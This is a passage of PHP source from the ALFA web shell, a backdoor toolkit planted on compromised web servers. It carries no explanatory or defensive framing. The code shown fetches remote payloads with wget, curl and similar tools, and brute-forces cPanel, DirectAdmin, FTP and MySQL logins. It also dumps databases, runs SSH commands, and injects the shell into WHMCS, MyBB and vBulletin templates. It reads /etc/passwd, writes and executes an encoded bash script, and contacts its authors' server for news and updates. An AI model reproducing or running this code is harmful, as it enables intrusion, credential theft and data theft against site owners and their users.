$_POST[`alfa6`]; $method = $_POST[`alfa7`]; $shell = $_POST[`alfa8`]; $key = str_replace(array(`"`,```),``,trim($_POST[`alfa9`])); if($key==``)$key=`alfa`; if($method==`my`){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[`__ALFA_SHELL_CODE`];} if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){ $code = ``.base"."64"."_dec"."ode($c));");$x($r["code"]);exit;}?>`; if(@is_file($file)&&@is_writable($file)){ @mysqli_query($conn,`DROP TABLE `alfa_bc``); @mysqli_query($conn,`CREATE TABLE `alfa_bc` (code LONGTEXT)`); @mysqli_query($conn,`INSERT INTO `alfa_bc` VALUES("`.$shell.`")`); @file_put_contents($file,$code." ".@file_get_contents($file)); __alert($success." Run With: ".basename($file)."?alfa=".$key.``);}else{__alert($error);}}}} echo(` `); alfafooter(); } function alfawhois(){ echo(" | Whois | Url: "); if($_POST[`alfa2`]==`>>`&&!empty($_POST[`alfa1`])){ $site = str_replace(array(`http://`,`https://`,`www.`,`ftp://`),``,$_POST[`alfa1`]); $target = `http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=`.$site; $data = @file_get_contents($target); if($data==``){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);} $target = @json_decode($data,true); echo __pre(); if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}} echo(" "); } function alfaremotedl(){ alfahead(); echo(" | Upload From Url | Url: &nbsp;&nbsp;&nbsp; Path: "); if(isset($_POST[`alfa1`],$_POST[`alfa2`],$_POST[`alfa3`])&&!empty($_POST[`alfa1`])&&$_POST[`alfa3`]==`>>`){ echo __pre(); $url = $_POST[`alfa1`]; $path = $_POST[`alfa2`]; echo(``); if(__download($url,$path)){ echo(`Success...!`); }else{ echo(`Error...!`); } echo(``); } echo(" "); alfafooter(); } function __download($url,$path=false){ if(!preg_match("/[a-z]+://.+/",$url)) return false; $saveas = basename(rawurldecode($url)); if($path){$saveas=$path.$saveas;} if($content = __read_file($url)){ if(@is_file($saveas))@unlink($saveas); if(__write_file($saveas, $content)){return true;}} $buff = alfaEx("wget ".$url." -O ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("curl ".$url." -o ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("lwp-download ".$url." ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("lynx -source ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("GET ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("links -source ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("fetch -o ".$saveas." -p ".$url); if(@is_file($saveas)) return true; return false; } function clean_string($string){   if(function_exists("iconv")){       $s = trim($string);       $s = iconv("UTF-8", "UTF-8//IGNORE", $s);   }   return $s; } function __read_file($file, $boom = true){ $content = false; if($fh = @fopen($file, "rb")){ $content = ""; while(!feof($fh)){ $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192); } } if(empty($content)||!$content){     $content = alfaEx("cat `".addslashes($file)."`"); } return $content; } function alfaSettings(){ alfahead(); AlfaNum(6,7,8,9,10); echo ` | Settings | | Generall Setting | | Change Color | `; if($_POST["alfa8"] == "main"){ echo ` | Settings | `; $lg_array = array(`0`=>`No`,`1`=>`Yes`); $penc_array = array(`false`=>`No`,`true`=>`Yes`); $protect_html = ""; $icon_html = ""; $postEnc_html = ""; $login_html = ""; foreach($lg_array as $key=>$val)$protect_html .= ``.$val.``; foreach($lg_array as $key=>$val)$icon_html .= ``.$val.``; foreach($penc_array as $key=>$val)$postEnc_html .= ``.$val.``; $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound"); foreach($lg_array as $key=>$val)$login_html .= ``.$val.``; echo ``; echo ` Protect: `.$protect_html.` Post Encryption: `.$postEnc_html.` Show Icons: `.$icon_html.` login Page: `.$login_html.` UserName: Password: `; if($_POST[`alfa5`]==`>>`){ echo __pre(); if(!empty($_POST[`alfa3`])){ $protect = $_POST[`alfa1`]; $lgpage = $_POST[`alfa2`]; $username = $_POST[`alfa3`]; $password = md5($_POST[`alfa4`]); $icon = $_POST[`alfa6`]; $post_encrypt = $_POST[`alfa7`]; @chdir($GLOBALS[`home_cwd`]); $basename = @basename($_SERVER[`PHP_SELF`]); $data = @file_get_contents($basename); $find_user = `/`user`(.*?),/i`; $find_pw = `/`pass`(.*?),/i`; $find_lg = `/`login_page`(.*?),/i`; $find_p = `/`safemode`(.*?),/i`; $icons = `/`show_icons`(.*?),/i`; $postEnc = `/`post_encryption`(.*?),/i`; if(!empty($username)&&preg_match($find_user,$data,$e)){ $new = ``user` => ``.$username.``,`; $data = str_replace($e[0],$new,$data); } if(!empty($_POST[`alfa4`])&&preg_match($find_pw,$data,$e)){ $new = ``pass` => ``.$password.``,`; $data = str_replace($e[0],$new,$data); } if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){ $new = ``login_page` => ``.$lgpage.``,`; $data = str_replace($e[0],$new,$data); } if(!empty($find_p)&&preg_match($find_p,$data,$e)){ $new = ``safemode` => ``.$protect.``,`; $data = str_replace($e[0],$new,$data); } if(preg_match($icons,$data,$e)){ $new = ``show_icons` => ``.$icon.``,`; $data = str_replace($e[0],$new,$data); } if(preg_match($postEnc,$data,$e)){ $new = ``post_encryption` => `.$post_encrypt.`,`; $data = str_replace($e[0],$new,$data); } if(@file_put_contents($basename,$data)){ echo `UserName: `.$username.` Password: `.$_POST[`alfa4`].``; }else{ __alert("File has no edit access...!"); } }else{ __alert("UserName is Empty !"); } } }elseif($_POST["alfa8"] == "color"){ echo(` | Custom Color | `); echo ``; $template = ``; $x = 1; foreach($GLOBALS[`__ALFA_COLOR__`] as $key => $value){     $multi = "";     if(is_array($value)){         if(isset($value["multi_selector"])){             $multi = __ZW5jb2Rlcg(json_encode($value));         }     }     $value = alfa_getColor($key);     $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));     echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template); } echo ``; echo ` Help {index} {target}: - * Use Default Color: Import Export `; if($_POST[`alfa7`]==`export`){     echo __pre();     $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();     $glob_colors = $GLOBALS["__ALFA_COLOR__"];     $array = array();     foreach($glob_colors as $k => $v){         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){             $v = trim($colors[$k]);         }else{             $v = trim(is_array($v)?$v["key_color"]:$v);         }         $array[$k] = $v;     }     $file = "alfa_color_config_".date(`Y-m-d-h_i_s`).".conf";     $config = json_encode($array, JSON_PRETTY_PRINT);     if(!@file_put_contents($file, $config)){         echo(` Color Config: `.$config.` `);     }else{         echo(` Download Config `);     } } if($_POST[`alfa2`]==`>>`){     echo __pre();     $colors = json_decode($_POST["alfa1"],true);     $array = "";     $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;     $glob_colors = $GLOBALS["__ALFA_COLOR__"];     foreach($glob_colors as $k => $v){         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){             $v = trim($colors[$k]);         }else{             $v = trim(is_array($v)?$v["key_color"]:$v);         }         $array .= `"`.trim($k).`" => "`.$v.`",`;     }     @chdir($GLOBALS[`home_cwd`]);     $basename = @basename($_SERVER[`PHP_SELF`]);     $data = @file_get_contents($basename);     $color = `/`color`(.*?)),/s`;     if(preg_match($color,$data,$e)){         $new = "`color` => array(".$array."),";         $data = str_replace($e[0],$new,$data);         if(@file_put_contents($basename, $data)){             echo(" [+] Success... ");         }else{             echo(" [-] We Not have permission to Edit shell...! ");         }     }else{         echo(" [-] Error...! ");     } } } echo(` `); alfafooter(); } function alfaplus(){ alfahead(); echo ` | Alfa + | | News | | Tools | | About Us | `; if($_POST[`alfa1`]==`news`||$_POST[`alfa1`]==`tools`){ try{ $s1 = `http://solevisible.com/`.($_POST[`alfa1`]==`news`?`news.php`:`tools.php`); $msg = " Can`t Connect to Remote Server ...! Please Try Again Later...! "; $news = new AlfaCURL(); if($news->Send($s1)){ $xml = $news->Send($s1); }else{ $xml = false; } if($xml){ if(@simplexml_load_string($xml)){ $doc = new DOMDocument; $doc->loadXML($xml); $data = $doc->getElementsByTagName(`data`)->item(0); $items = $data->getElementsByTagName(`item`); foreach($items as $item){ $title = $item->getElementsByTagName(`title`)->item(0)->nodeValue; $description = $item->getElementsByTagName(`description`)->item(0)->nodeValue; $link = $item->getElementsByTagName(`link`)->item(0)->nodeValue; $pubDate = $item->getElementsByTagName(`pubDate`)->item(0)->nodeValue; echo(__pre()."$title $description Date: $pubDate"); } }else{ echo($msg); } }else{ echo($msg); } }catch(Exception $e){ echo $e->getMessage(); }}elseif($_POST[`alfa1`]==`about`){ echo __pre()." &#9774; ~ PEACE ~ &#9774; Shell Coded By Sole Sad & Invisible (ALFA TEaM) Contact : solevisible@gmail.com Telegram Channel: @solevisible Skype : ehsan.invisible Skype : sole.sad Persian Gulf For Ever Iranian Hackers :) Our Friends : Mr.PERSIA , R3veC0der "; } echo(` `); alfafooter(); } function alfaDumper(){ alfahead(); echo(` `); AlfaNum(8,9,10); echo " | Mysql Database Dumper | ".getConfigHtml(`all`)." "; $table = array(`td1` =>  array(`color` => `FFFFFF`, `tdName` => `db_host : `, `inputName` => `db_host`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`),  `td2` =>  array(`color` => `FFFFFF`, `tdName` => `db_username : `, `inputName` => `db_username`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`),  `td3` =>  array(`color` => `FFFFFF`, `tdName` => `db_password : `, `inputName` => `db_password`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`),  `td4` =>  array(`color` => `FFFFFF`, `tdName` => `db_name : `, `inputName` => `db_name`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`),  `td5` =>  array(`color` => `FFFFFF`, `tdName` => `Dump Path: `, `inputName` => `dfile`, `inputValue` => htmlspecialchars($GLOBALS[`cwd`]).`alfa.sql`, `inputSize` => `50`) ); create_table($table); echo " "; $username = ($_POST[`alfa3`]); $password = ($_POST[`alfa4`]); $dbname = ($_POST[`alfa5`]); $dfile = ($_POST[`alfa6`]); $host = ($_POST[`alfa7`]); if(!empty($dbname)){ echo __pre(); $msg = "Check this :  ".$dfile.""; if(@mysqli_connect($host,$username,$password,$dbname)){ if(strlen(alfaEx("mysqldump"))>0){ alfaEx("mysqldump --single-transaction --host="$host" --user="$username" --password="$password" $dbname > `".addslashes($dfile)."`"); echo($msg); }else{ __alert("Error...!"); } }else{ echo(`mysqli_connect : Error!`); } } echo(` `); alfafooter(); } function Alfa_DirectAdmin_Cracker($info){ if(!$info[`mysql`]) $url = $info[`protocol`].$info[`target`].`:`.$info[`port`].`/CMD_LOGIN`; else $url = $info[`protocol`].$info[`target`].`/phpmyadmin`; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_USERAGENT,`Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0`); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_USERPWD, $info[`username`].`:`.$info[`password`]); if($info[`mysql`])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error ";} elseif(preg_match(`/CMD_FILE_MANAGER|frameset/i`,$result)){ echo `UserName: `.$info[`username`].` PassWord: `.$info[`password`].`  Login Success.... `; $info[`target`] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_CP_Cracker($info){ $url = $info[`protocol`].$info[`target`].`:`.$info[`port`]; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_USERAGENT,`Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0`); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info[`username`].":".$info[`password`]) . " ")); curl_setopt($curl, CURLOPT_URL, $url); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error ";} elseif(preg_match(`/filemanager/i`,$result)){ echo `UserName: `.$info[`username`].` PassWord: `.$info[`password`].`  Login Success.... `; $info[`target`] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_FTP_Cracker($info){ $url = $info[`protocol`].$info[`target`]; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT,`Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0`); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERPWD, "".$info[`username`].":".$info[`password`].""); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error ";} elseif(preg_match(`/(d+):(d+)/i`,$result)){ echo `UserName: `.$info[`username`].` PassWord: `.$info[`password`].`  Login Success.... `; $info[`target`] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info[`target`].`:`.$info[`port`],$info[`username`],$info[`password`])){ CrackerResualt($info); echo `UserName: `.$info[`username`].` PassWord: `.$info[`password`].`  Login Success.... `; } } function Alfa_FTPC($info){ if($con=@ftp_connect($info[`target`],$info[`port`])){ if($con){ $login=@ftp_login($con,$info[`username`],$info[`password`]); if($login){CrackerResualt($info);}}} @ftp_close($con); } function CrackerResualt($info){ $res = $info[`target`].` => `.$info[`username`].":".$info[`password`]." " ; $c = @fopen($info[`fcrack`],`a+`); @fwrite($c, $res); @fclose($c); } function Alfa_Call_Function_Cracker($method,$info){ switch($method){case `cp`:return Alfa_CP_Cracker($info);break;case `direct`: case `phpmyadmin`:return Alfa_DirectAdmin_Cracker($info);break;case `ftp`:return Alfa_FTP_Cracker($info);break;case `mysql`:return Alfa_Mysql_Cracker($info);break;case `mysql`:return Alfa_FTPC($info);break;} } function alfaCrackers(){ alfahead(); AlfaNum(9,10); echo ` | Brute Forcer | Login Page: `; foreach(array(`cp`=>`Cpanel`,`direct`=>`DirectAdmin`,`ftp`=>`FTP`,`phpmyadmin`=>`PhpMyAdmin[DirectAdmin]`,`mysql`=>`mysql_connect()`,`ftpc`=>`ftp_connect()`) as $key=>$val)echo(``.$val.``); echo ` Protocol: `; foreach(array(`https://`,`http://`,`ftp://`) as $val)echo(``.$val.``); echo ` Website/ip Address: Port: Users List Passwords `.($GLOBALS[`sys`]==`unix`?alfaEx("cut -d: -f1 /etc/passwd"):"").` &nbsp Save Result Into File `; $target = str_replace(array(`https://`,`http://`,`ftp://`),``,$_POST[`alfa1`]); $port = $_POST[`alfa2`]; $usernames= $_POST[`alfa3`]; $passwords = $_POST[`alfa4`]; $fcrack = $_POST[`alfa5`]; $cracking = $_POST[`alfa6`]; $protocol = $_POST[`alfa7`]; $loginpanel = $_POST[`alfa8`]; $p = $loginpanel == `phpmyadmin` ? $p = true : false; if($cracking==`start`){ echo __pre(); $exuser = explode(" ",$usernames); $expw = explode(" ",$passwords); foreach($exuser as $user){ foreach($expw as $pw){ $array = array(`username` => trim($user),`password` => trim($pw),`port` => trim($port),`target` => trim($target),`protocol` => trim($protocol),`fcrack` => trim($fcrack),`mysql` => $p); Alfa_Call_Function_Cracker($loginpanel,$array); } } echo ` Attack Finished...`; } echo ` `; alfafooter(); } function alfassh2(){ if(function_exists(`ssh2_connect`)){ $_SESSION[`connected`]= false; $ssh_ip = $_POST[`alfa1`]; $ssh_login = $_POST[`alfa2`]; $ssh_pass = $_POST[`alfa3`]; $ssh_port = $_POST[`alfa4`]; $ssh_command = $_POST[`alfa5`]; if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port)) { if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION[`connected`]= true; } } if($_SESSION[`connected`]!== true){ alfahead(); echo " "; echo " IP SSH USER SSH PASS SSH PORT "; alfafooter(); } if($_SESSION[`connected`]==true){ alfahead(); echo " "; echo " >"); return false;`> "; $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command); stream_set_blocking($alfastream,true); $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO); if($_POST[`alfa6`]==`>>`){ echo ` `; ob_start(); echo  stream_get_contents($output); echo htmlspecialchars(ob_get_clean()); } echo " "; alfafooter(); }}else{ alfahead(); echo ` Server does not support SSH2 `; alfafooter(); } } function output($string){ echo " Click Here ! ";} function alfaShellInjectors(){ alfahead(); echo ` `; AlfaNum(11); echo ` | Cms Shell Injector | | WHMCS | | MyBB | | vBulletin |`; $selector = ` Shell Inject Method : AutoMaticManuel `; if(isset($_POST[`alfa1`]) && $_POST[`alfa1`]== `whmcs`){ AlfaNum(); echo __pre()." | WHMCS | ".getConfigHtml(`whmcs`)." "; $table = array(`td1` =>  array(`color` => `FFFFFF`, `tdName` => `Path WHMCS Url : `, `inputName` => `path`, `inputValue` => `http://site.com/whmcs`, `inputSize` => `50`),  `td2` =>  array(`color` => `FFFFFF`, `tdName` => `Mysql Host : `, `inputName` => `dbh`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`),  `td3` =>  array(`color` => `FFFFFF`, `tdName` => `Db Name : `, `inputName` => `dbn`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`),  `td4` =>  array(`color` => `FFFFFF`, `tdName` => `Db User : `, `inputName` => `dbu`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`),  `td5` =>  array(`color` => `FFFFFF`, `tdName` => `Db Pass : `, `inputName` => `dbp`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`) ); create_table($table); echo $selector; echo "

Dear $newin,

Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.

To reset your password, please visit the url below:
{$pw_reset_url}

When you visit the link above, your password will be reset, and the new password will be emailed to you.

{$signature}

Please go to Target => ".$path."/pwreset.php
 And Reset Password With Email => solevisible@fbi.gov
And Go To => ".$path."/solevisible.php

";}}else{__alert(`Path is not Valid...`);}}}

}if(isset($_POST[`alfa2`]) && $_POST[`alfa2`]== `mybb`){

AlfaNum(1,2,3,5);

echo __pre()."
| MyBB |
".getConfigHtml("mybb")."


";

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Host : `, `inputName` => `dbh`, `id`=>`db_host`,`inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `DataBase Name : `, `inputName` => `dbn`, `id`=>`db_name` ,`inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `User Name : `, `inputName` => `dbu`, `id`=>`db_user`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Password : `, `inputName` => `dbp`, `id`=>`db_pw`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix : `, `inputName` => `prefix`, `id`=>`db_prefix`,`inputValue` => `mybb_`, `inputSize` => `50`)

);

create_table($table);

echo $selector;

echo "
";

if(isset($_POST[`alfa6`])) {

$dbu = $_POST[`alfa6`];

$dbn = $_POST[`alfa7`];

$dbp = $_POST[`alfa8`];

$dbh = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$method = $_POST[`alfa4`];

$shellCode = "{${".ALFA_UPLOADER."}}";

$newinshell = str_replace("`","`",$shellCode);

if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){

$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$inject = "select template from {$prefix}templates where  title= `calendar`";

$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));

$GetTemp = mysqli_fetch_assoc($result);

$saveDate = $GetTemp[`template`];

$repsave = str_replace($shellCode,"",$saveDate);

$repsave = str_replace("`","`",$repsave);

$createShell = "update {$prefix}templates SET template= `".$newinshell.$repsave."` where title = `calendar`";

$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));

$geturl = "select value from {$prefix}settings where name= `bburl`";

$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));

$rowb = mysqli_fetch_assoc($findurl);

$furl = $rowb[`value`];

$realurl = parse_url($furl,PHP_URL_HOST);

$realpath = parse_url($furl,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if (extension_loaded(`sockets`) && function_exists(`fsockopen`) && $method == `auto` ){

if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1
");

@fputs($fsock, "HOST: $realurl
");

@fputs($fsock, "Connection: close

");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$repairdbtemp = "update {$prefix}templates SET template= `$repsave` where title = `calendar`";

$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}

@fclose($fsock);}}elseif(function_exists(`curl_version`) && $method == `auto`){

$AlfaCurl->Send($realurl.$realpath."/calendar.php");

$res = true;

}

if($res){

$ff = `http://`.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = `http://`.$realurl.$realpath."/calendar.php";

$fff = `http://`.$realurl.$realpath."/solevisible.php";

echo "

Please Go To Target => ".$ff."
And Go To => ".$fff."

";

}}}}

if(isset($_POST[`alfa3`]) && $_POST[`alfa3`]== `vb`){

AlfaNum(1,2,7,9,10);

echo __pre().`
| vbulletin |
`.getConfigHtml(`vb`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Host : `, `inputName` => `lo`, `id`=>`db_host`,`inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `DataBase Name : `, `inputName` => `db`, `id`=>`db_name`,`inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `User Name : `, `inputName` => `user`, `id`=>`db_user`,`inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Password : `, `inputName` => `pass`, `id`=>`db_pw`,`inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix : `, `inputName` => `tab`, `id`=>`db_prefix`,`inputValue` => ``, `inputSize` => `50`)

);

create_table($table);

echo $selector;

echo `
`;

if(isset($_POST[`alfa4`])&&!empty($_POST[`alfa4`])){

$method = $_POST[`alfa8`];

$code = "{${".ALFA_UPLOADER."}}{${exit()}}&";

$conn=@mysqli_connect($_POST[`alfa2`],$_POST[`alfa4`],$_POST[`alfa5`],$_POST[`alfa7`]) or die(@mysqli_error($conn));

$rec = "select `template` from ".$_POST[`alfa6`]."template WHERE title =`faq`";

$recivedata = @mysqli_query($conn,$rec);

$getd = @mysqli_fetch_assoc($recivedata);

$savetoass = $getd[`template`];

$code = str_replace("`","`",$code);

$p = "UPDATE ".$_POST[`alfa6`]."template SET `template`=`".$code."` WHERE `title`=`faq`";

$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));

$geturl = @mysqli_query($conn,"select `value` from ".$_POST[`alfa6`]."setting WHERE `varname`=`bburl`");

$getval = @mysqli_fetch_assoc($geturl);

$saveval = $getval[`value`];

$realurl = parse_url($saveval,PHP_URL_HOST);

$realpath = parse_url($saveval,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if(extension_loaded(`sockets`) && function_exists(`fsockopen`) && $method == `auto`){

if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/faq.php HTTP/1.1
");

@fputs($fsock, "HOST: $realurl
");

@fputs($fsock, "Connection: close

");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$p1 = "UPDATE ".$_POST[`alfa6`]."template SET template =`".str_replace("`","`",$savetoass)."` WHERE title =`faq`";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

@fclose($fsock);

}

}elseif(function_exists(`curl_version`) && $method == `auto`){

$AlfaCurl->Send($realurl.$realpath."/faq.php");

$p1 = "UPDATE ".$_POST[`alfa6`]."template SET template =`".str_replace("`","`",$savetoass)."` WHERE title =`faq`";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

if($res){

$ff = `http://`.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = `http://`.$realurl.$realpath."/faq.php";

$fff = `http://`.$realurl.$realpath."/solevisible.php";

echo "
First Open This Link => ".$ff."
Second Open This Link => ".$fff."
";}}}

echo ``;

alfafooter();

}

function alfaupdatepath(){

    if($_POST[`path`]!=``){

        $_SESSION[__LAST_CWD__] = $_POST[`path`];

    }

    echo($_SESSION[__LAST_CWD__]);

}

function alfacheckfiletype(){

    $path = $_POST[`path`];

    $arg = $_POST[`arg`];

    if(@is_file($path.`/`.$arg)){

        echo("file");

    }else{

        echo("dir");

    }

}

function alfacheckupdate(){

    if(!isset($_COOKIE[`alfa_checkupdate`])){

        if(function_exists("curl_version")){

            $update = new AlfaCURL();

            $json = $update->Send("http://solevisible.com/update.json");

            $json = @json_decode($json);

            if($json){

                if(__ALFA_VERSION__ != $json->version){

                    @setcookie("alfa_checkupdate", "1", time()+86400);

                    echo(`
X
`.$json->text.`
 Version: `.$json->version.`
`);

                }

            }

        }

    }

}

function alfaWriteTocgiapi($name, $source){

    @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

    @mkdir(`alfacgiapi`,0755);

    __write_file("alfacgiapi/".$name, __get_resource($source));

    @chmod("alfacgiapi/".$name, 0755);

}

function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}

function alfaupdateheader(){

    if(!isset($_SESSION["updateheader_data"])){

        $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";

        $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));

        alfaWriteTocgiapi("getheader.alfa",$bash);

        $data = alfaEx("cd `{$realdir}/alfacgiapi`;sh getheader.alfa",false,true,true);

        if(@is_array(@json_decode($data,true))){

            $_SESSION["updateheader_data"] = $data;

            echo $data;

        }

    }else{

        echo $_SESSION["updateheader_data"];

    }

}

function alfassiShell(){

alfahead();

echo `
`;

@mkdir(`alfa_shtml`,0755);

@chdir(`alfa_shtml`);

alfacgihtaccess(`shtml`);

